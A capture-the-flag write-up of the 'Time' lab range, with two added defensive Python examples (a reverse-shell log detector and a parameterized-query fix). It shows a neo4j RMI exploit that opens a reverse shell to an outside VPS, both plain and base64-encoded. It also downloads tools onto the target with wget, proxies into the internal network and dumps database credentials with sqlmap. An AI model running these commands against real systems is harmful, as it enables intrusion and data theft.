
春秋云镜Time

flag1

Start with an fscan scan.

E:\CTFFIT\ONE-FOX集成工具箱_V8公开版_by狐狸\gui_scan\fscan>fscan -h 39.99.143.95

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
39.99.143.95:7687 open
39.99.143.95:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle https://39.99.143.95:7687 code:400 len:50 title:None
已完成 2/2
[*] 扫描结束,耗时: 45.7250451s

Port 7687 is open. Nothing obviously exploitable shows up here, but a search shows that 7687 is the port neo4j runs on.
https://www.cnblogs.com/Kawakaze777/p/18153842

This is the vulnerability. Run the exploit locally with the jar and send a reverse shell to my own VPS.

PS D:\Edge\CVE-2021-34371.jar-main\CVE-2021-34371.jar-main> java -jar rhino_gadget.jar rmi://39.99.143.95:1337 "sh -i >& /dev/tcp/38.55.99.185/7777 0>&1"
Trying to enumerate server bindings:
Found binding: shell
[+] Found valid binding, proceeding to exploit
[+] Caught an unmarshalled exception, this is expected.
RemoteException occurred in server thread; nested exception is:
java.rmi.UnmarshalException: error unmarshalling arguments; nested exception is:
java.io.IOException
[+] Exploit completed

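Sending the reverse shell command directly did not work for me here, which was strange. After reading up on it, I found that the reverse shell command has to be passed base64-encoded and then decoded before it succeeds.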

PS D:\Edge\CVE-2021-34371.jar-main\CVE-2021-34371.jar-main> java -jar rhino_gadget.jar rmi://39.99.143.95:1337 "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMzguNTUuOTkuMTg1Lzc3NzcgMD4mMQ==}|{base64,-d}|{bash,-i}"
Trying to enumerate server bindings:
Found binding: shell
[+] Found valid binding, proceeding to exploit
[+] Caught an unmarshalled exception, this is expected.
RemoteException occurred in server thread; nested exception is:
java.rmi.UnmarshalException: error unmarshalling arguments; nested exception is:
java.io.IOException
[+] Exploit completed
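
An added example (not part of the original write-up): a Python check for process-execution logs that flags both command lines used above, the direct /dev/tcp redirection and the same payload wrapped in {echo,<base64>}|{base64,-d}. The log line format, the user= and cmd= fields and the 192.0.2.10:4444 endpoint are constructed for the demo.

```python
import base64
import binascii
import re
from typing import List, NamedTuple, Optional, Tuple

# "echo <blob> | base64 -d" in both spellings: the brace-expansion form used on
# this page ({echo,<blob>}|{base64,-d}) and the ordinary space-separated form.
B64_PIPE = re.compile(
    r"\{?\s*echo[\s,]+[\"']?(?P<blob>[A-Za-z0-9+/]{12,}={0,2})[\"']?\s*\}?"
    r"\s*\|\s*\{?\s*base64[\s,]+(?:-d|-D|--decode)\b"
)
# Shell socket redirection, e.g. /dev/tcp/<host>/<port>.
SOCKET_REDIRECT = re.compile(
    r"/dev/(?:tcp|udp)/(?P<host>[^/\s]+)/(?P<port>\d{1,5})"
)


class Finding(NamedTuple):
    encoded: bool   # True when the redirect was hidden behind base64
    host: str
    port: int
    payload: str    # the text in which the redirect was found


def inspect_cmdline(cmdline: str) -> Optional[Finding]:
    """Return a Finding if the command line opens a shell socket redirect."""
    # Case 1: the redirect is written directly in the command line.
    m = SOCKET_REDIRECT.search(cmdline)
    if m:
        return Finding(False, m["host"], int(m["port"]), cmdline)
    # Case 2: the redirect only appears after decoding an echo|base64 -d blob.
    for pipe in B64_PIPE.finditer(cmdline):
        try:
            raw = base64.b64decode(pipe["blob"], validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64, nothing to inspect
        decoded = raw.decode("utf-8", "replace")
        m = SOCKET_REDIRECT.search(decoded)
        if m:
            return Finding(True, m["host"], int(m["port"]), decoded)
    return None


def scan(lines: List[str]) -> List[Tuple[int, Finding]]:
    """Scan 'timestamp user=... cmd=...' lines; return (line number, Finding)."""
    hits = []
    for number, line in enumerate(lines, start=1):
        _, sep, cmdline = line.partition(" cmd=")
        if not sep:
            continue  # line has no command field
        finding = inspect_cmdline(cmdline)
        if finding:
            hits.append((number, finding))
    return hits


# Constructed sample input (documentation address 192.0.2.10, not from the page).
_ENCODED = base64.b64encode(b"sh -i >& /dev/tcp/192.0.2.10/4444 0>&1").decode()
_BENIGN = base64.b64encode(b"nightly backup finished\n").decode()
SAMPLE_LOG = [
    "2025-01-01T10:00:01Z user=neo4j cmd=java -jar /opt/app/service.jar",
    "2025-01-01T10:00:02Z user=neo4j cmd=bash -c {echo,%s}|{base64,-d}|{bash,-i}" % _ENCODED,
    "2025-01-01T10:00:03Z user=backup cmd=sh -c echo %s | base64 -d" % _BENIGN,
    "2025-01-01T10:00:04Z user=neo4j cmd=sh -i >& /dev/tcp/192.0.2.10/4444 0>&1",
]

if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        kind = "base64-wrapped" if finding.encoded else "direct"
        print(f"line {number}: {kind} redirect to {finding.host}:{finding.port}")
```

A database service account such as neo4j spawning bash or sh at all is worth alerting on; the decode step adds the destination host and port to the alert.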

Next, on the VPS:

root@dkhkdB44QUxpXagmmGyT:~/neoj4# nc -lnvp 7777
Listening on 0.0.0.0 7777
Connection received on 39.99.143.95 49118
sh: 0: can't access tty; job control turned off
$ whoami
neo4j
$
$ script -qc /bin/bash /dev/null
neo4j@ubuntu:/$

The shell has connected back and been stabilized. Now grab flag01.

neo4j@ubuntu:~$ cat f*
cat f*
██████████ ██
░░░░░██░░░ ░░
░██ ██ ██████████ █████
░██ ░██░░██░░██░░██ ██░░░██
░██ ░██ ░██ ░██ ░██░███████
░██ ░██ ░██ ░██ ░██░██░░░░
░██ ░██ ███ ░██ ░██░░██████
░░ ░░ ░░░ ░░ ░░ ░░░░░░


flag01: flag{ed2ae7bf-93c3-41ac-ad44-26c428d41218}

Do you know the authentication process of Kerberos?
......This will be the key to your progress.

flag2

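Next, fscan and the internal network proxy tooling need to be uploaded to the target, using wget.

Put everything you want to transfer in the /var/www/html directory on your own VPS, then start Python's web server.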

root@dkhkdB44QUxpXagmmGyT:/var/www/html# ls
fscan linux_x64_agent
root@dkhkdB44QUxpXagmmGyT:/var/www/html# cd /
root@dkhkdB44QUxpXagmmGyT:/# cd /var/www/html
root@dkhkdB44QUxpXagmmGyT:/var/www/html# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
39.99.143.95 - - [16/Nov/2025 16:59:14] "GET /fscan HTTP/1.1" 200 -

Then just wget the files from the shell on the target machine.

neo4j@ubuntu:/tmp$ wget 38.55.99.185/fscan
wget 38.55.99.185/fscan
--2025-11-16 17:01:01-- http://38.55.99.185/fscan
Connecting to 38.55.99.185:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7100304 (6.8M) [application/octet-stream]
Saving to: ‘fscan’

fscan 100%[===================>] 6.77M 13.0MB/s in 0.5s

2025-11-16 17:01:02 (13.0 MB/s) - ‘fscan’ saved [7100304/7100304]

neo4j@ubuntu:/tmp$ ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.6.36 netmask 255.255.0.0 broadcast 172.22.255.255
inet6 fe80::216:3eff:fe32:3b4c prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:32:3b:4c txqueuelen 1000 (Ethernet)
RX packets 133387 bytes 178374703 (178.3 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 28601 bytes 4972987 (4.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1336 bytes 123734 (123.7 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1336 bytes 123734 (123.7 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

That shows the internal subnet. Scan it directly with fscan.

neo4j@ubuntu:/tmp$ chmod +x fscan
chmod +x fscan

neo4j@ubuntu:/tmp$ ./fscan -h 172.22.6.36/24
./fscan -h 172.22.6.36/24

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.6.12 is alive
(icmp) Target 172.22.6.25 is alive
(icmp) Target 172.22.6.36 is alive
(icmp) Target 172.22.6.38 is alive
[*] Icmp alive hosts len is: 4
172.22.6.12:88 open
172.22.6.25:445 open
172.22.6.12:445 open
172.22.6.25:139 open
172.22.6.12:139 open
172.22.6.25:135 open
172.22.6.12:135 open
172.22.6.38:80 open
172.22.6.38:22 open
172.22.6.36:7687 open
172.22.6.36:22 open
[*] alive ports len is: 11
start vulscan
[*] NetInfo
[*]172.22.6.12
[->]DC-PROGAME
[->]172.22.6.12
[*] NetBios 172.22.6.25 XIAORANG\WIN2019
[*] NetInfo
[*]172.22.6.25
[->]WIN2019
[->]172.22.6.25
[*] WebTitle http://172.22.6.38 code:200 len:1531 title:后台登录
[*] NetBios 172.22.6.12 [+] DC:DC-PROGAME.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.6.12 (Windows Server 2016 Datacenter 14393)
[*] WebTitle https://172.22.6.36:7687 code:400 len:50 title:None
已完成 11/11
[*] 扫描结束,耗时: 12.294552591s

The scan finds four live internal hosts. We already have a shell on .36, so the next step is to set up the internal network proxy.

neo4j@ubuntu:/tmp$ ./linux_x64_agent -c 38.55.99.185:1111
./linux_x64_agent -c 38.55.99.185:1111
2025/11/16 17:17:51 [*] Starting agent node actively.Connecting to 38.55.99.185:1111

[*] Starting admin node on port 1111

.-') .-') _ ('\ .-') /' ('-. ('\ .-') /' ('-.
( OO ). ( OO) ) '.( OO ),' ( OO ).-. '.( OO ),' ( OO ).-.
(_)---\_)/ '._ .-'),-----. ,--./ .--. / . --. /,--./ .--. / . --. / ,--. ,--.
/ _ | |'--...__)( OO' .-. '| | | | \-. \ | | | | \-. \ \ '.' /
\ :' '. '--. .--'/ | | | || | | |,.-'-' | || | | |,.-'-' | | .-') /
'..'''.) | | \_) | |\| || |.'.| |_)\| |_.' || |.'.| |_)\| |_.' |(OO \ /
.-._) \ | | \ | | | || | | .-. || | | .-. | | / /\_
\ / | | '' '-' '| ,'. | | | | || ,'. | | | | | '-./ /.__)
'-----' '--' '-----' '--' '--' '--' '--''--' '--' '--' '--' '--'
{ v2.2 Author:ph4ntom }
[*] Waiting for new connection...
[*] Connection from node 39.99.143.95:34284 is set up successfully! Node id is 0
(admin) >> use 0
(node 0) >> socks 1123
[*] Trying to listen on 0.0.0.0:1123......
[*] Waiting for agent's response......
[*] Socks start successfully!
(node 0) >>

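First visit the web application found in the scan above. It is vulnerable to SQL injection.

Capture the request with HackBar, then run sqlmap against it.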

POST /index.php HTTP/1.1
Origin: http://172.22.6.38
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.22.6.38/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

password=123&username=admin

This request is missing a Host header; just add one.

POST /index.php HTTP/1.1
Host: 172.22.6.38
Origin: http://172.22.6.38
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.22.6.38/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

password=123&username=admin

┌──(root㉿kali)-[/home/kali]
└─# proxychains sqlmap -r test.txt --dbs
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
___
__H__
___ ___["]_____ ___ ___ {1.9.8#stable}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:40:23 /2025-11-16/

[17:40:23] [INFO] parsing HTTP request from 'test.txt'
[17:40:24] [INFO] testing connection to the target URL
[proxychains] Strict chain ... 38.55.99.185:1123 ... 172.22.6.38:80 ... OK
[17:40:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[17:40:24] [INFO] testing if the target URL content is stable
[17:40:25] [INFO] target URL content is stable
[17:40:25] [INFO] testing if POST parameter 'password' is dynamic
[17:40:25] [WARNING] POST parameter 'password' does not appear to be dynamic
[17:40:25] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
[17:40:25] [INFO] testing for SQL injection on POST parameter 'password'
[17:40:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:40:26] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[17:40:27] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[17:40:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:40:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[17:40:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[17:40:31] [INFO] testing 'Generic inline queries'
[17:40:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[17:40:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[17:40:34] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[17:40:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[17:40:46] [INFO] POST parameter 'password' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[17:41:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:41:11] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:41:16] [INFO] target URL appears to be UNION injectable with 3 columns
[17:41:16] [INFO] POST parameter 'password' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[17:41:20] [INFO] testing if POST parameter 'username' is dynamic
[17:41:20] [WARNING] POST parameter 'username' does not appear to be dynamic
[17:41:21] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[17:41:21] [INFO] testing for SQL injection on POST parameter 'username'
[17:41:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:41:22] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[17:41:22] [INFO] testing 'Generic inline queries'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[17:41:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[17:41:27] [WARNING] POST parameter 'username' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 91 HTTP(s) requests:
---
Parameter: password (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: password=123' AND (SELECT 4599 FROM (SELECT(SLEEP(5)))dclH) AND 'mSzJ'='mSzJ&username=admin

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: password=123' UNION ALL SELECT NULL,CONCAT(0x71626a6b71,0x774e6565764e756b626f6c73465a6a5a6b4a79504f6e7752656c6e5458446a6e6951476675426455,0x716a787871),NULL-- -&username=admin
---
[17:41:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[17:41:28] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] oa_db
[*] performance_schema
[*] sys

[17:41:28] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.22.6.38'

[*] ending @ 17:41:28 /2025-11-16/


┌──(root㉿kali)-[/home/kali]
└─# proxychains sqlmap -r test.txt -D oa_db --table
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
___
__H__
___ ___["]_____ ___ ___ {1.9.8#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

Usage: python3 sqlmap [options]

sqlmap: error: ambiguous option: --table (--table-prefix, --tables?)

┌──(root㉿kali)-[/home/kali]
└─# proxychains sqlmap -r test.txt -D oa_db --tables
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
___
__H__
___ ___[(]_____ ___ ___ {1.9.8#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:41:52 /2025-11-16/

[17:41:52] [INFO] parsing HTTP request from 'test.txt'
[17:41:52] [INFO] resuming back-end DBMS 'mysql'
[17:41:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: password=123' AND (SELECT 4599 FROM (SELECT(SLEEP(5)))dclH) AND 'mSzJ'='mSzJ&username=admin

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: password=123' UNION ALL SELECT NULL,CONCAT(0x71626a6b71,0x774e6565764e756b626f6c73465a6a5a6b4a79504f6e7752656c6e5458446a6e6951476675426455,0x716a787871),NULL-- -&username=admin
---
[17:41:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[17:41:52] [INFO] fetching tables for database: 'oa_db'
Database: oa_db
[3 tables]
+------------+
| oa_admin |
| oa_f1Agggg |
| oa_users |
+------------+

[17:41:52] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.22.6.38'

[*] ending @ 17:41:52 /2025-11-16/
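
An added example (not code from the target application or the original write-up) of why the password field reported above is injectable and what the fix looks like: a login query built by string concatenation beside a parameterized one that also stores only a salted hash. The query text, the oa_admin_hashed table and the demo credentials are assumptions, and SQLite stands in for the MySQL back end.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed demo credentials (not values from the page).
DEMO_USER = "administrator"
DEMO_PASSWORD = "constructed-demo-password"

# Same shape as the UNION payload sqlmap reported: close the quote, append a
# 3-column UNION, comment out the trailing quote. 'marker' is a constructed value.
UNION_PROBE = "123' UNION ALL SELECT NULL,'marker',NULL-- -"


def _derive(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2-HMAC-SHA256 hash of the password."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for oa_db with an assumed 3-column admin table."""
    db = sqlite3.connect(":memory:")
    # Weak layout: plaintext password column, as the oa_admin dump suggests.
    db.execute("CREATE TABLE oa_admin (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO oa_admin VALUES (1, ?, ?)", (DEMO_USER, DEMO_PASSWORD))
    # Hardened layout (hypothetical table): per-user salt and password hash only.
    db.execute(
        "CREATE TABLE oa_admin_hashed "
        "(id INTEGER, username TEXT UNIQUE, salt BLOB, pw_hash BLOB)"
    )
    salt = os.urandom(16)
    db.execute(
        "INSERT INTO oa_admin_hashed VALUES (1, ?, ?, ?)",
        (DEMO_USER, salt, _derive(DEMO_PASSWORD, salt)),
    )
    return db


def login_vulnerable(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Weak: both POST fields are pasted into the SQL text between quotes."""
    sql = (
        "SELECT id, username, password FROM oa_admin "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    # Any returned row counts as a successful login, including a UNION row.
    return db.execute(sql).fetchone() is not None


def login_hardened(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Fixed: input is bound as data; the password is never part of the SQL."""
    row = db.execute(
        "SELECT salt, pw_hash FROM oa_admin_hashed WHERE username = ?",
        (username,),
    ).fetchone()
    if row is None:
        # Do the same hashing work for unknown users to keep timing uniform.
        _derive(password, b"\x00" * 16)
        return False
    salt, pw_hash = row
    return hmac.compare_digest(_derive(password, salt), pw_hash)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, UNION probe:", login_vulnerable(db, "admin", UNION_PROBE))
    print("hardened,   UNION probe:", login_hardened(db, "admin", UNION_PROBE))
    print("hardened,   real login: ", login_hardened(db, DEMO_USER, DEMO_PASSWORD))
```

With bound parameters the quote in the password field is compared as a literal character, so neither the SLEEP nor the UNION payload changes the query structure.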


The flag is in here; just read it out directly.

┌──(root㉿kali)-[/home/kali]
└─# proxychains sqlmap -r test.txt -D oa_db -T oa_f1Agggg --dump
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
___
__H__
___ ___[)]_____ ___ ___ {1.9.8#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:44:18 /2025-11-16/

[17:44:18] [INFO] parsing HTTP request from 'test.txt'
[17:44:18] [INFO] resuming back-end DBMS 'mysql'
[17:44:18] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: password=123' AND (SELECT 4599 FROM (SELECT(SLEEP(5)))dclH) AND 'mSzJ'='mSzJ&username=admin

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: password=123' UNION ALL SELECT NULL,CONCAT(0x71626a6b71,0x774e6565764e756b626f6c73465a6a5a6b4a79504f6e7752656c6e5458446a6e6951476675426455,0x716a787871),NULL-- -&username=admin
---
[17:44:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[17:44:19] [INFO] fetching columns for table 'oa_f1Agggg' in database 'oa_db'
[17:44:19] [INFO] fetching entries for table 'oa_f1Agggg' in database 'oa_db'
Database: oa_db
Table: oa_f1Agggg
[1 entry]
+----+--------------------------------------------+
| id | flag02 |
+----+--------------------------------------------+
| 1 | flag{b142f5ce-d9b8-4b73-9012-ad75175ba029} |
+----+--------------------------------------------+

[17:44:19] [INFO] table 'oa_db.oa_f1Agggg' dumped to CSV file '/root/.local/share/sqlmap/output/172.22.6.38/dump/oa_db/oa_f1Agggg.csv'
[17:44:19] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.22.6.38'

[*] ending @ 17:44:19 /2025-11-16/

Now look at the other two tables.

┌──(root㉿kali)-[/home/kali]
└─# proxychains sqlmap -r test.txt -D oa_db -T oa_admin --dump
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
___
__H__
___ ___[,]_____ ___ ___ {1.9.8#stable}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:45:31 /2025-11-16/

[17:45:31] [INFO] parsing HTTP request from 'test.txt'
[17:45:31] [INFO] resuming back-end DBMS 'mysql'
[17:45:31] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: password=123' AND (SELECT 4599 FROM (SELECT(SLEEP(5)))dclH) AND 'mSzJ'='mSzJ&username=admin

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: password=123' UNION ALL SELECT NULL,CONCAT(0x71626a6b71,0x774e6565764e756b626f6c73465a6a5a6b4a79504f6e7752656c6e5458446a6e6951476675426455,0x716a787871),NULL-- -&username=admin
---
[17:45:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[17:45:32] [INFO] fetching columns for table 'oa_admin' in database 'oa_db'
[17:45:32] [INFO] fetching entries for table 'oa_admin' in database 'oa_db'
Database: oa_db
Table: oa_admin
[1 entry]
+----+------------------+---------------+
| id | password | username |
+----+------------------+---------------+
| 1 | bo2y8kAL3HnXUiQo | administrator |
+----+------------------+---------------+

[17:45:32] [INFO] table 'oa_db.oa_admin' dumped to CSV file '/root/.local/share/sqlmap/output/172.22.6.38/dump/oa_db/oa_admin.csv'
[17:45:32] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.22.6.38'

[*] ending @ 17:45:32 /2025-11-16/


┌──(root㉿kali)-[/home/kali]
└─# proxychains sqlmap -r test.txt -D oa_db -T oa_users --dump
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
___
__H__
___ ___[.]_____ ___ ___ {1.9.8#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:45:55 /2025-11-16/

[17:45:55] [INFO] parsing HTTP request from 'test.txt'
[17:45:55] [INFO] resuming back-end DBMS 'mysql'
[17:45:55] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: password=123' AND (SELECT 4599 FROM (SELECT(SLEEP(5)))dclH) AND 'mSzJ'='mSzJ&username=admin

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: password=123' UNION ALL SELECT NULL,CONCAT(0x71626a6b71,0x774e6565764e756b626f6c73465a6a5a6b4a79504f6e7752656c6e5458446a6e6951476675426455,0x716a787871),NULL-- -&username=admin
---
[17:45:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[17:45:55] [INFO] fetching columns for table 'oa_users' in database 'oa_db'
[17:45:55] [INFO] fetching entries for table 'oa_users' in database 'oa_db'
[proxychains] Strict chain ... 38.55.99.185:1123 ... OK
... 172.22.6.38:80 ... OK
Database: oa_db
Table: oa_users
[500 entries]
+-----+----------------------------+-------------+-----------------+
| id | email | phone | username |
+-----+----------------------------+-------------+-----------------+
[17:45:56] [WARNING] console output will be trimmed to last 256 rows due to large table size
| 245 | chenyan@xiaorang.lab | 18281528743 | CHEN YAN |
| 246 | tanggui@xiaorang.lab | 18060615547 | TANG GUI |
| 247 | buning@xiaorang.lab | 13046481392 | BU NING |
| 248 | beishu@xiaorang.lab | 18268508400 | BEI SHU |
| 249 | shushi@xiaorang.lab | 17770383196 | SHU SHI |
| 250 | fuyi@xiaorang.lab | 18902082658 | FU YI |
| 251 | pangcheng@xiaorang.lab | 18823789530 | PANG CHENG |
| 252 | tonghao@xiaorang.lab | 13370873526 | TONG HAO |
| 253 | jiaoshan@xiaorang.lab | 15375905173 | JIAO SHAN |
| 254 | dulun@xiaorang.lab | 13352331157 | DU LUN |
| 255 | kejuan@xiaorang.lab | 13222550481 | KE JUAN |
| 256 | gexin@xiaorang.lab | 18181553086 | GE XIN |
| 257 | lugu@xiaorang.lab | 18793883130 | LU GU |
| 258 | guzaicheng@xiaorang.lab | 15309377043 | GU ZAI CHENG |
| 259 | feicai@xiaorang.lab | 13077435367 | FEI CAI |
| 260 | ranqun@xiaorang.lab | 18239164662 | RAN QUN |
| 261 | zhouyi@xiaorang.lab | 13169264671 | ZHOU YI |
| 262 | shishu@xiaorang.lab | 18592890189 | SHI SHU |
